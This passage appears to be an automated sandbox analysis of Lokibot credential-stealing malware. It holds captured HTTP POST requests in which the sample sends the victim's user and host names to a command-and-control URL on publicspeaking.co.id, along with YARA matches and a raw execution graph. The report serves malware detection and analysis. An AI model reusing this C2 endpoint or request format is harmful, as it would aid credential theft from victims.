                      Aug 1, 2023 04:47:04.497777939 CEST8.8.8.8192.168.2.30xd56aNo error (0)publicspeaking.co.id216.239.36.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:04.841779947 CEST8.8.8.8192.168.2.30xbee4No error (0)publicspeaking.co.id216.239.32.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:04.841779947 CEST8.8.8.8192.168.2.30xbee4No error (0)publicspeaking.co.id216.239.36.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:04.841779947 CEST8.8.8.8192.168.2.30xbee4No error (0)publicspeaking.co.id216.239.38.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:04.841779947 CEST8.8.8.8192.168.2.30xbee4No error (0)publicspeaking.co.id216.239.34.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:05.642297983 CEST8.8.8.8192.168.2.30x1a3No error (0)publicspeaking.co.id216.239.32.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:05.642297983 CEST8.8.8.8192.168.2.30x1a3No error (0)publicspeaking.co.id216.239.38.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:05.642297983 CEST8.8.8.8192.168.2.30x1a3No error (0)publicspeaking.co.id216.239.36.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:05.642297983 CEST8.8.8.8192.168.2.30x1a3No error (0)publicspeaking.co.id216.239.34.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:06.153187037 CEST8.8.8.8192.168.2.30x9e7eNo error (0)publicspeaking.co.id216.239.32.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:06.153187037 CEST8.8.8.8192.168.2.30x9e7eNo error (0)publicspeaking.co.id216.239.34.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:06.153187037 CEST8.8.8.8192.168.2.30x9e7eNo error (0)publicspeaking.co.id216.239.36.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:06.153187037 CEST8.8.8.8192.168.2.30x9e7eNo error (0)publicspeaking.co.id216.239.38.21A (IP address)IN (0x0001)false
                      • publicspeaking.co.id
                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.349697216.239.38.2180C:\Users\user\Desktop\wi7zJOZT2r.exe
                      TimestampkBytes transferredDirectionData
                      Aug 1, 2023 04:47:03.589313030 CEST93OUTPOST /cjay/Panel/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: publicspeaking.co.id
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 97CBD574
                      Content-Length: 190
                      Connection: close
                      Aug 1, 2023 04:47:03.604659081 CEST94OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 35 00 37 00 31 00 33 00 34 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                      Data Ascii: 'ckav.ruhardz571345DESKTOP-716T771k08F9C4E9C79A3B52B3F739430vo2ty
                      Aug 1, 2023 04:47:03.685257912 CEST94INHTTP/1.0 301 Moved Permanently
                      Location: http://www.publicspeaking.co.id/cjay/Panel/five/fre.php
                      Date: Tue, 01 Aug 2023 02:47:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Server: ghs
                      Content-Length: 252
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 63 6a 61 79 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/cjay/Panel/five/fre.php">here</A>.</BODY></HTML>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.349698216.239.38.2180C:\Users\user\Desktop\wi7zJOZT2r.exe
                      TimestampkBytes transferredDirectionData
                      Aug 1, 2023 04:47:03.996310949 CEST95OUTPOST /cjay/Panel/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: publicspeaking.co.id
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 97CBD574
                      Content-Length: 190
                      Connection: close
                      Aug 1, 2023 04:47:04.011425972 CEST95OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 35 00 37 00 31 00 33 00 34 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                      Data Ascii: 'ckav.ruhardz571345DESKTOP-716T771+08F9C4E9C79A3B52B3F7394309qzoi
                      Aug 1, 2023 04:47:04.040185928 CEST96INHTTP/1.0 301 Moved Permanently
                      Location: http://www.publicspeaking.co.id/cjay/Panel/five/fre.php
                      Date: Tue, 01 Aug 2023 02:47:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Server: ghs
                      Content-Length: 252
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 63 6a 61 79 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/cjay/Panel/five/fre.php">here</A>.</BODY></HTML>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      2192.168.2.349699216.239.38.2180C:\Users\user\Desktop\wi7zJOZT2r.exe
                      TimestampkBytes transferredDirectionData
                      Aug 1, 2023 04:47:04.225848913 CEST97OUTPOST /cjay/Panel/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: publicspeaking.co.id
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 97CBD574
                      Content-Length: 163
                      Connection: close
                      Aug 1, 2023 04:47:04.249774933 CEST97OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 35 00 37 00 31 00 33 00 34 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                      Data Ascii: (ckav.ruhardz571345DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Aug 1, 2023 04:47:04.278326988 CEST98INHTTP/1.0 301 Moved Permanently
                      Location: http://www.publicspeaking.co.id/cjay/Panel/five/fre.php
                      Date: Tue, 01 Aug 2023 02:47:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Server: ghs
                      Content-Length: 252
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 63 6a 61 79 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/cjay/Panel/five/fre.php">here</A>.</BODY></HTML>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      3192.168.2.349700216.239.38.2180C:\Users\user\Desktop\wi7zJOZT2r.exe
                      TimestampkBytes transferredDirectionData
                      Aug 1, 2023 04:47:04.525368929 CEST99OUTPOST /cjay/Panel/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: publicspeaking.co.id
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 97CBD574
                      Content-Length: 163
                      Connection: close
                      Aug 1, 2023 04:47:04.549263000 CEST99OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 35 00 37 00 31 00 33 00 34 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                      Data Ascii: (ckav.ruhardz571345DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Aug 1, 2023 04:47:04.586734056 CEST100INHTTP/1.0 301 Moved Permanently
                      Location: http://www.publicspeaking.co.id/cjay/Panel/five/fre.php
                      Date: Tue, 01 Aug 2023 02:47:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Server: ghs
                      Content-Length: 252
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 63 6a 61 79 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/cjay/Panel/five/fre.php">here</A>.</BODY></HTML>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      4192.168.2.349701216.239.32.2180C:\Users\user\Desktop\wi7zJOZT2r.exe
                      TimestampkBytes transferredDirectionData
                      Aug 1, 2023 04:47:04.869621992 CEST101OUTPOST /cjay/Panel/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: publicspeaking.co.id
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 97CBD574
                      Content-Length: 163
                      Connection: close
                      Aug 1, 2023 04:47:04.893372059 CEST101OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 35 00 37 00 31 00 33 00 34 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                      Data Ascii: (ckav.ruhardz571345DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Aug 1, 2023 04:47:04.969077110 CEST101INHTTP/1.0 301 Moved Permanently
                      Location: http://www.publicspeaking.co.id/cjay/Panel/five/fre.php
                      Date: Tue, 01 Aug 2023 02:47:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Server: ghs
                      Content-Length: 252
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 63 6a 61 79 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/cjay/Panel/five/fre.php">here</A>.</BODY></HTML>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      5192.168.2.349702216.239.32.2180C:\Users\user\Desktop\wi7zJOZT2r.exe
                      TimestampkBytes transferredDirectionData
                      Aug 1, 2023 04:47:05.661750078 CEST102OUTPOST /cjay/Panel/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: publicspeaking.co.id
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 97CBD574
                      Content-Length: 163
                      Connection: close
                      Aug 1, 2023 04:47:05.676820993 CEST103OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 35 00 37 00 31 00 33 00 34 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                      Data Ascii: (ckav.ruhardz571345DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Aug 1, 2023 04:47:05.705703974 CEST103INHTTP/1.0 301 Moved Permanently
                      Location: http://www.publicspeaking.co.id/cjay/Panel/five/fre.php
                      Date: Tue, 01 Aug 2023 02:47:05 GMT
                      Content-Type: text/html; charset=UTF-8
                      Server: ghs
                      Content-Length: 252
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 63 6a 61 79 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/cjay/Panel/five/fre.php">here</A>.</BODY></HTML>


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Target ID:0
                      Start time:04:47:01
                      Start date:01/08/2023
                      Path:C:\Users\user\Desktop\wi7zJOZT2r.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\wi7zJOZT2r.exe
                      Imagebase:0x400000
                      File size:106'496 bytes
                      MD5 hash:3DC7D72C3B38CE465684F96FAEAA0CE7
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000000.359525035.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: unknown
                      • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000000.00000002.368819944.0000000002984000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, Author: unknown
                      • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low

                      Reset < >

                        Execution Graph

                        Execution Coverage:31.9%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:4.5%
                        Total number of Nodes:1831
                        Total number of Limit Nodes:93
                        execution_graph 9736 40c640 9737 404bee 6 API calls 9736->9737 9738 40c656 9737->9738 9739 40c70f 9738->9739 9740 404bee 6 API calls 9738->9740 9741 40c66b 9740->9741 9742 40c708 9741->9742 9744 404bee 6 API calls 9741->9744 9743 402bab 2 API calls 9742->9743 9743->9739 9745 40c683 9744->9745 9747 404bee 6 API calls 9745->9747 9750 40c701 9745->9750 9746 402bab 2 API calls 9746->9742 9748 40c694 9747->9748 9757 40c6f8 9748->9757 9763 40c522 9748->9763 9749 402bab 2 API calls 9749->9750 9750->9746 9752 40c6a9 9753 40c6ef 9752->9753 9754 405872 4 API calls 9752->9754 9755 402bab 2 API calls 9753->9755 9756 40c6c5 9754->9756 9755->9757 9758 405872 4 API calls 9756->9758 9757->9749 9759 40c6d5 9758->9759 9760 405872 4 API calls 9759->9760 9761 40c6e7 9760->9761 9762 402bab 2 API calls 9761->9762 9762->9753 9764 402b7c 2 API calls 9763->9764 9765 40c542 9764->9765 9765->9752 9766 405941 9767 4031e5 4 API calls 9766->9767 9768 405954 9767->9768 8296 409046 8309 413b28 8296->8309 8298 40906d 8300 405b6f 6 API calls 8298->8300 8299 40904e 8299->8298 8301 403fbf 7 API calls 8299->8301 8302 40907c 8300->8302 8301->8298 8303 409092 8302->8303 8313 409408 8302->8313 8305 4090a3 8303->8305 8308 402bab 2 API calls 8303->8308 8307 402bab 2 API calls 8307->8303 8308->8305 8310 413b31 8309->8310 8311 413b38 8309->8311 8312 404056 6 API calls 8310->8312 8311->8299 8312->8311 8314 409413 8313->8314 8315 40908c 8314->8315 8327 409d36 8314->8327 8315->8307 8326 40945c 8433 40a35d 8326->8433 8328 409d43 8327->8328 8329 40a35d 4 API calls 8328->8329 8330 409d55 8329->8330 8331 4031e5 4 API calls 8330->8331 8332 409d8b 8331->8332 8333 4031e5 4 API calls 8332->8333 8334 409dd0 8333->8334 8335 405b6f 6 API calls 8334->8335 8366 409423 8334->8366 8337 409df7 8335->8337 8336 409e1c 8338 4031e5 4 API calls 8336->8338 8336->8366 8337->8336 8340 402bab 2 API calls 8337->8340 8339 409e62 8338->8339 8341 4031e5 4 API calls 8339->8341 8340->8336 8342 409e82 8341->8342 8343 4031e5 4 API calls 8342->8343 8344 409ea2 8343->8344 8345 4031e5 4 API calls 8344->8345 8346 409ec2 8345->8346 8347 4031e5 4 API calls 8346->8347 8348 409ee2 8347->8348 8349 4031e5 4 API calls 8348->8349 8350 409f02 8349->8350 8351 4031e5 4 API calls 8350->8351 8352 409f22 8351->8352 8353 4031e5 4 API calls 8352->8353 8356 409f42 8353->8356 8354 40a19b 8355 408b2c 4 API calls 8354->8355 8355->8366 8356->8354 8357 409fa3 8356->8357 8358 405b6f 6 API calls 8357->8358 8357->8366 8360 409fbd 8358->8360 8359 40a02c 8361 4031e5 4 API calls 8359->8361 8388 40a16d 8359->8388 8360->8359 8362 402bab 2 API calls 8360->8362 8363 40a070 8361->8363 8365 409fd7 8362->8365 8368 4031e5 4 API calls 8363->8368 8364 402bab 2 API calls 8364->8366 8367 405b6f 6 API calls 8365->8367 8366->8326 8389 4056bf 8366->8389 8370 409fe5 8367->8370 8369 40a090 8368->8369 8372 4031e5 4 API calls 8369->8372 8370->8359 8371 402bab 2 API calls 8370->8371 8373 409fff 8371->8373 8374 40a0b0 8372->8374 8375 405b6f 6 API calls 8373->8375 8377 4031e5 4 API calls 8374->8377 8376 40a00d 8375->8376 8376->8359 8379 40a021 8376->8379 8378 40a0d0 8377->8378 8380 4031e5 4 API calls 8378->8380 8381 402bab 2 API calls 8379->8381 8382 40a0f0 8380->8382 8381->8366 8383 4031e5 4 API calls 8382->8383 8384 40a110 8383->8384 8385 4031e5 4 API calls 8384->8385 8387 40a134 8384->8387 8385->8387 8387->8388 8443 408b2c 8387->8443 8388->8364 8388->8366 8390 402b7c 2 API calls 8389->8390 8392 4056cd 8390->8392 8391 4056d4 8394 408c4d 8391->8394 8392->8391 8393 402b7c 2 API calls 8392->8393 8393->8391 8395 413ba4 6 API calls 8394->8395 8396 408c5c 8395->8396 8397 408f02 8396->8397 8398 408f3a 8396->8398 8401 40903e 8396->8401 8400 405b6f 6 API calls 8397->8400 8399 405b6f 6 API calls 8398->8399 8415 408f51 8399->8415 8402 408f0c 8400->8402 8417 413aca 8401->8417 8402->8401 8406 408f31 8402->8406 8446 40a1b6 8402->8446 8404 405b6f 6 API calls 8404->8415 8405 402bab 2 API calls 8405->8401 8406->8405 8408 409031 8409 402bab 2 API calls 8408->8409 8409->8406 8410 409022 8411 402bab 2 API calls 8410->8411 8412 409028 8411->8412 8413 402bab 2 API calls 8412->8413 8413->8406 8414 402bab GetProcessHeap HeapFree 8414->8415 8415->8401 8415->8404 8415->8406 8415->8408 8415->8410 8415->8414 8416 40a1b6 14 API calls 8415->8416 8480 4044ee 8415->8480 8416->8415 8418 413ad7 8417->8418 8426 409451 8417->8426 8419 405781 4 API calls 8418->8419 8420 413af0 8419->8420 8421 405781 4 API calls 8420->8421 8422 413afe 8421->8422 8423 405762 4 API calls 8422->8423 8424 413b0e 8423->8424 8425 405781 4 API calls 8424->8425 8424->8426 8425->8426 8427 405695 8426->8427 8428 4056a0 8427->8428 8432 4056b9 8427->8432 8429 402bab 2 API calls 8428->8429 8430 4056b3 8429->8430 8431 402bab 2 API calls 8430->8431 8431->8432 8432->8326 8434 40a368 8433->8434 8435 40a39a 8433->8435 8438 4031e5 4 API calls 8434->8438 8436 40a3af 8435->8436 8437 4031e5 4 API calls 8435->8437 8439 408b2c 4 API calls 8436->8439 8441 40a3ca 8436->8441 8437->8436 8442 40a38a 8438->8442 8439->8441 8440 408b2c 4 API calls 8440->8442 8441->8440 8441->8442 8442->8315 8444 4031e5 4 API calls 8443->8444 8445 408b3e 8444->8445 8445->8388 8447 40a202 8446->8447 8448 40a1c3 8446->8448 8602 405f08 8447->8602 8450 405b6f 6 API calls 8448->8450 8452 40a1d0 8450->8452 8451 40a1fc 8451->8406 8452->8451 8455 40a1f3 8452->8455 8490 40a45b 8452->8490 8454 40a333 8456 402bab 2 API calls 8454->8456 8458 402bab 2 API calls 8455->8458 8456->8451 8458->8451 8459 405b6f 6 API calls 8461 40a245 8459->8461 8460 40a25d 8462 405b6f 6 API calls 8460->8462 8461->8460 8463 413a58 13 API calls 8461->8463 8468 40a26b 8462->8468 8465 40a257 8463->8465 8464 40a28b 8466 405b6f 6 API calls 8464->8466 8467 402bab 2 API calls 8465->8467 8472 40a297 8466->8472 8467->8460 8468->8464 8469 40a284 8468->8469 8609 40955b 8468->8609 8471 402bab 2 API calls 8469->8471 8471->8464 8474 40a2b0 8472->8474 8477 40a2b7 8472->8477 8616 40968e 8472->8616 8473 405b6f 6 API calls 8473->8477 8476 402bab 2 API calls 8474->8476 8476->8477 8477->8454 8477->8473 8479 402bab 2 API calls 8477->8479 8626 4098a7 8477->8626 8479->8477 8481 402b7c 2 API calls 8480->8481 8482 404512 8481->8482 8484 404585 GetLastError 8482->8484 8485 402bab 2 API calls 8482->8485 8488 402b7c 2 API calls 8482->8488 8489 40457c 8482->8489 8881 4044a7 8482->8881 8486 404592 8484->8486 8484->8489 8485->8482 8487 402bab 2 API calls 8486->8487 8487->8489 8488->8482 8489->8415 8635 40642c 8490->8635 8492 40a469 8493 40c4ff 8492->8493 8638 4047e6 8492->8638 8493->8455 8496 4040bb 12 API calls 